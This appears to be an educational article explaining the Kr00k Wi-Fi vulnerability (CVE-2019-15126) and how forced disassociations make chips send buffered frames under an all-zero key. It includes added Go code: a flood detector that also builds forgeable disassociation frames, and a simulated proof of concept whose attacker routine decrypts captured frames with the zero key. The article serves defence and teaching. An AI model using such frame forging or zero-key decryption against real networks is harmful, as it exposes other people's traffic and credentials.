Summary:
ESET researchers discovered a previously unknown vulnerability in Wi-Fi chips and named it Kr00k. More than a billion devices are affected, including phones, tablets, computers, Wi-Fi routers and IoT devices with Wi-Fi capability. This article aims to shed some light on this newly discovered attack vector: the vulnerability itself, how it is triggered, and how an attacker exploits it. As discussed at the end of the article, protect yourself now by making sure every Wi-Fi capable device you own has had its firmware updated.
Start:
The Kr00k vulnerability is a serious flaw, tracked as CVE-2019-15126 and given the name Kr00k by the ESET researchers who found it. Until its disclosure the flaw was unknown, yet it affects over a billion devices. A successful attack allows an adversary to decrypt wireless network packets transmitted by vulnerable devices, that is, devices built around the affected Wi-Fi chips, on WPA2 networks using AES-CCMP encryption (both WPA2-Personal and WPA2-Enterprise). As previously mentioned, those chips are found in phones, tablets, computers, Wi-Fi routers and IoT devices with Wi-Fi capability. This is a huge threat to the IoT world, as it presents a new and previously unknown attack vector.
Kr00k affects devices with Wi-Fi chips by Broadcom and Cypress that have not yet been patched. Because the flaw sits in the transmitting chip, both ends of a connection matter: a fully patched client talking to an unpatched access point still has the traffic the access point sends to it exposed, and the reverse holds as well. Essentially, as soon as there is one weak link in your ecosystem in terms of Wi-Fi chips, there is a possible attack vector.
To quote ESET's executive summary more specifically: ‘tests confirmed that prior to patching, some client devices by Amazon (Echo, Kindle), Apple (iPhone, iPad, MacBook), Google (Nexus), Samsung (Galaxy), Raspberry (Pi 3), Xiaomi (RedMi), as well as some access points by Asus and Huawei, were vulnerable to Kr00k.’
ESET goes on to say that a conservative estimate puts the number of Wi-Fi-capable devices and access points vulnerable to Kr00k at over a billion. The ESET researchers noted that vendors whose products they did not test also use the affected chipsets in their devices.
The Vulnerability:
From the ESET white paper (quoted; the numbered steps refer to the diagram in the paper): ‘Kr00k manifests itself after a disassociation. Once a station’s WLAN session gets disassociated (1), the session key (TK) stored in the Wireless Network Interface Controller’s (WNIC) Wi-Fi chip is cleared in memory – set to zero (2). This is expected behavior, as no further data is supposed to be transmitted after the disassociation. However, we discovered that all data frames that were left in the chip’s Tx (transmit) buffer were transmitted (4) after being encrypted with this all-zero key (3).’
The Attack Vector:
Since Kr00k (encryption with an all-zero TK) manifests itself following a disassociation, an adversary can exploit it by triggering disassociations on demand rather than waiting for the ones that occur naturally. This is possible because a disassociation can be triggered by a disassociation frame, which is an 802.11 management frame that is neither authenticated nor encrypted, so anyone in radio range can forge one carrying the victim's and the access point's MAC addresses (unless the network enforces 802.11w protected management frames, which authenticate disassociation and deauthentication frames). There are possibly other methods or events that can cause a disassociation (e.g. transmitting malformed packets, EAPOL frames, etc.) and/or trigger Kr00k.
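As an added example (not code from the article or from ESET), the Go program below shows the defender's side of that trigger: it decodes the frame-control byte and the addresses of captured 802.11 management frames, picks out disassociation and deauthentication frames, and reports sender/receiver pairs that repeat above a threshold, which is what a forced reconnect loop looks like on the air. The capture it runs on is constructed inline (one protected data frame, one organic deauthentication, and a burst of disassociations forged with the access point's address as sender), the radiotap header is assumed to be already stripped, and the threshold of three is an arbitrary choice for the example.

```go
package main

import (
	"encoding/binary"
	"fmt"
	"net"
)

// Frame-control values from the 802.11 MAC header: type 0 is management, and these two subtypes end a session.
const (
	typeMgmt        = 0
	subtypeDisassoc = 0x0A
	subtypeDeauth   = 0x0C
)

// teardown is a decoded disassociation or deauthentication frame.
type teardown struct {
	subtype  byte
	dst, src net.HardwareAddr // Addr1 (receiver) and Addr2 (sender) of the management header
	reason   uint16
}

// parseTeardown decodes the 24-byte management MAC header plus the 2-byte reason code and returns ok=false for
// anything that is not a disassociation or deauthentication frame, or is too short. Radiotap is assumed stripped.
// In the first frame-control byte, bits 0-1 are the version, bits 2-3 the type and bits 4-7 the subtype.
func parseTeardown(b []byte) (teardown, bool) {
	if len(b) < 26 || (b[0]>>2)&3 != typeMgmt {
		return teardown{}, false
	}
	st := b[0] >> 4
	if st != subtypeDisassoc && st != subtypeDeauth {
		return teardown{}, false
	}
	return teardown{st, net.HardwareAddr(b[4:10]), net.HardwareAddr(b[10:16]), binary.LittleEndian.Uint16(b[24:26])}, true
}

// buildTeardown constructs a minimal frame of the given subtype (test input). This is exactly what an attacker
// can forge: nothing in it is authenticated unless the network enforces 802.11w protected management frames.
func buildTeardown(subtype byte, dst, src, bssid net.HardwareAddr, reason uint16) []byte {
	b := make([]byte, 26)
	b[0] = subtype << 4 // version 0, type 0 (management)
	copy(b[4:], dst)
	copy(b[10:], src)
	copy(b[16:], bssid)
	binary.LittleEndian.PutUint16(b[24:], reason)
	return b
}

// floods returns the sender -> receiver pairs with at least threshold teardown frames in the capture window.
// A Kr00k attacker has to keep kicking the same station off, so the pair repeats; an organic disassociation does not.
func floods(capture [][]byte, threshold int) map[string]int {
	counts := map[string]int{}
	for _, raw := range capture {
		if t, ok := parseTeardown(raw); ok {
			counts[t.src.String()+" -> "+t.dst.String()]++
		}
	}
	for pair, n := range counts {
		if n < threshold {
			delete(counts, pair)
		}
	}
	return counts
}

// sampleCapture is constructed input: one protected data frame, one organic deauthentication, and a burst of
// disassociations forged with the access point's address as the sender, all aimed at a single station.
func sampleCapture() [][]byte {
	ap, _ := net.ParseMAC("aa:bb:cc:00:00:01")
	victim, _ := net.ParseMAC("02:11:22:33:44:55")
	other, _ := net.ParseMAC("02:66:77:88:99:aa")
	capture := [][]byte{make([]byte, 26)}
	capture[0][0], capture[0][1] = 0x08, 0x41 // frame control: data frame, protected; parseTeardown ignores it
	capture = append(capture, buildTeardown(subtypeDeauth, other, ap, ap, 2)) // reason 2: previous authentication no longer valid
	for i := 0; i < 5; i++ {
		capture = append(capture, buildTeardown(subtypeDisassoc, victim, ap, ap, 8)) // reason 8: station leaving the BSS
	}
	return capture
}

func main() {
	for pair, n := range floods(sampleCapture(), 3) {
		fmt.Printf("possible forced-disassociation loop: %s (%d teardown frames)\n", pair, n)
	}
}
```

Against the constructed capture it reports the single access point -> victim pair with five teardown frames and ignores the organic deauthentication. On a real trace the count would be kept per time window; the point is that because the frames are unauthenticated, the only signal a defender gets is their frequency and their addressing, which is also why enabling 802.11w removes this particular trigger.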
How they do it:
As explained in the previous section, after a disassociation occurs, the data left in the chip's Tx buffer is transmitted encrypted with the all-zero TK. These data frames can be captured by an adversary and subsequently decrypted, and a single flush can contain several kilobytes of potentially sensitive information. This works even if the attacker is not connected (authenticated and associated) to the WLAN and does not know the PSK: a WNIC in monitor mode is enough to capture the frames, which is what makes Kr00k attractive to attackers compared with other attack techniques used against Wi-Fi security. By repeatedly triggering disassociations (which in practice cause reassociations, since the session usually reconnects), the attacker can capture more data frames. Note that what Kr00k exposes is the WPA2 link-layer encryption only: data protected at a higher layer, such as TLS/HTTPS traffic, stays encrypted, and the attacker recovers plaintext only where the application itself sends in the clear.
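The following Go program is an added example, not code from the article or from ESET. It ties together the vulnerability described under "The Vulnerability" and the attack just outlined: a minimal model of the affected chip encrypts queued frames with AES-CCMP (CCM per RFC 3610 with the 802.11 parameters: AES-128, 8-byte MIC, 13-byte nonce of priority || A2 || PN, 2-byte length field), a disassociation zeroes the temporal key before the Tx buffer is drained, and an attacker holding nothing but a monitor-mode capture tries every frame with the all-zero TK. The MIC verifying under that key is the attacker's proof that a frame really was sent with the cleared key. The wire layout (A2 || PN || ciphertext || MIC), the two-byte stand-in for the MAC header used as AAD, the MAC address, the temporal key and the payload strings are all constructed for the example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"fmt"
)

func mustAES(tk []byte) cipher.Block {
	blk, err := aes.NewCipher(tk)
	if err != nil {
		panic(err)
	}
	return blk
}

// nonce builds the 13-byte CCM nonce 802.11 uses: priority byte (0) || transmitter address A2 || 48-bit PN.
func nonce(a2 [6]byte, pn uint64) []byte {
	var p [8]byte
	binary.BigEndian.PutUint64(p[:], pn)
	return append(append([]byte{0}, a2[:]...), p[2:]...)
}

// ccmBlock lays out the 16-byte CCM blocks: B0 = 0x59 || nonce || len(msg) and A_i = 0x01 || nonce || i.
func ccmBlock(flags byte, n []byte, v uint16) []byte {
	return append(append([]byte{flags}, n...), byte(v>>8), byte(v))
}

// ccmpCTR is the CCM keystream pass: AES-CTR from counter block A_i (cipher.NewCTR increments it big-endian).
// The payload uses i = 1 onward, the MIC is masked with S_0 (i = 0); encryption and decryption are the same op.
func ccmpCTR(blk cipher.Block, n []byte, i uint16, in []byte) []byte {
	out := make([]byte, len(in))
	cipher.NewCTR(blk, ccmBlock(1, n, i)).XORKeyStream(out, in)
	return out
}

// ccmpMIC is the CCM authentication pass (RFC 3610, M=8, L=2): CBC-MAC over B0 || AAD || msg, masked with S_0.
func ccmpMIC(blk cipher.Block, n, aad, msg []byte) []byte {
	b := ccmBlock(0x59, n, uint16(len(msg)))                         // flags 0x59 = Adata | M'=(8-2)/2=3 | L'=2-1=1
	b = append(append(b, byte(len(aad)>>8), byte(len(aad))), aad...) // AAD is encoded as a 2-byte length || data
	b = append(b, make([]byte, -len(b)&15)...)                       // zero-pad to a block boundary
	b = append(b, msg...)
	b = append(b, make([]byte, -len(b)&15)...)
	x := make([]byte, 16)
	for i := 0; i < len(b); i += 16 {
		for j := range x {
			x[j] ^= b[i+j]
		}
		blk.Encrypt(x, x)
	}
	return ccmpCTR(blk, n, 0, x[:8]) // T = first 8 bytes of the last CBC block, XORed with S_0
}

// send models the chip draining its Tx buffer: each payload goes out under tk, the key the chip holds at that
// moment, with a fresh PN. A frame is laid out here as A2 || PN || ciphertext || MIC (constructed wire format;
// the AAD 0x08 0x41 || A2 stands in for the real cleartext MAC header, which CCMP authenticates in full).
func send(tk []byte, a2 [6]byte, pn *uint64, txBuffer ...[]byte) (air [][]byte) {
	blk := mustAES(tk)
	for _, p := range txBuffer {
		*pn++
		n := nonce(a2, *pn)
		f := append(append([]byte{}, n[1:]...), ccmpCTR(blk, n, 1, p)...)
		air = append(air, append(f, ccmpMIC(blk, n, append([]byte{0x08, 0x41}, a2[:]...), p)...))
	}
	return air
}

// kr00kRecover is the attacker's side (no PSK, no association, only a monitor-mode capture): every frame is tried
// with TK = 0, and a MIC that verifies under the all-zero key proves it was encrypted after the key was cleared.
func kr00kRecover(captured [][]byte) (leaked [][]byte) {
	zero := mustAES(make([]byte, 16))
	for _, f := range captured {
		n, ct, m := append([]byte{0}, f[:12]...), f[12:len(f)-8], f[len(f)-8:]
		if pt := ccmpCTR(zero, n, 1, ct); bytes.Equal(ccmpMIC(zero, n, append([]byte{0x08, 0x41}, f[:6]...), pt), m) {
			leaked = append(leaked, pt)
		}
	}
	return leaked
}

// simulate: one frame sent while properly keyed, then a disassociation arrives with two frames still in the Tx
// buffer, then the attacker's pass over everything that went on the air.
func simulate() (leaked [][]byte, captured int) {
	tk, a2, pn := []byte("constructed-TK16"), [6]byte{2, 0x11, 0x22, 0x33, 0x44, 0x55}, uint64(0) // stand-in TK and MAC
	air := send(tk, a2, &pn, []byte("GET /inbox HTTP/1.1 (sent while properly keyed)"))
	tk = make([]byte, 16) // disassociation: the chip clears the TK to all zeros ...
	air = append(air, send(tk, a2, &pn, // ... but still drains what was left in the Tx buffer
		[]byte("POST /login user=alice&pass=hunter2 (left in Tx buffer)"),
		[]byte("Cookie: session=abc123 (left in Tx buffer)"))...)
	return kr00kRecover(air), len(air)
}

func main() {
	leaked, captured := simulate()
	fmt.Printf("%d frames captured, %d decrypt under the all-zero TK: %q\n", captured, len(leaked), leaked)
}
```

Run it with go run: it reports three captured frames, of which the two that were still buffered at disassociation time decrypt, while the frame sent under the real key fails the MIC check. The same loop, pointed at real captures, is what separates Kr00k-leaked frames from the rest of a trace: a frame whose CCMP MIC verifies under a 16-byte zero key cannot have been sent with a properly installed temporal key.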
ESET reported the vulnerability to the chip manufacturers Broadcom and Cypress, who have since released patches, and patches for devices by the major device manufacturers have also been released. To protect yourself as a user, make sure that the firmware of all your Wi-Fi capable devices, access points included, is up to date.
If you are interested in reading further: Kr00k is related to, but not the same as, KRACK, the 2017 key reinstallation attacks against the WPA2 four-way handshake. ESET discovered Kr00k while investigating KRACK.
References:
The facts and information throughout this article were taken from ESET's published white paper on Kr00k, which can be found HERE. This article has also taken facts and information from John Leyden's article, which can be found HERE.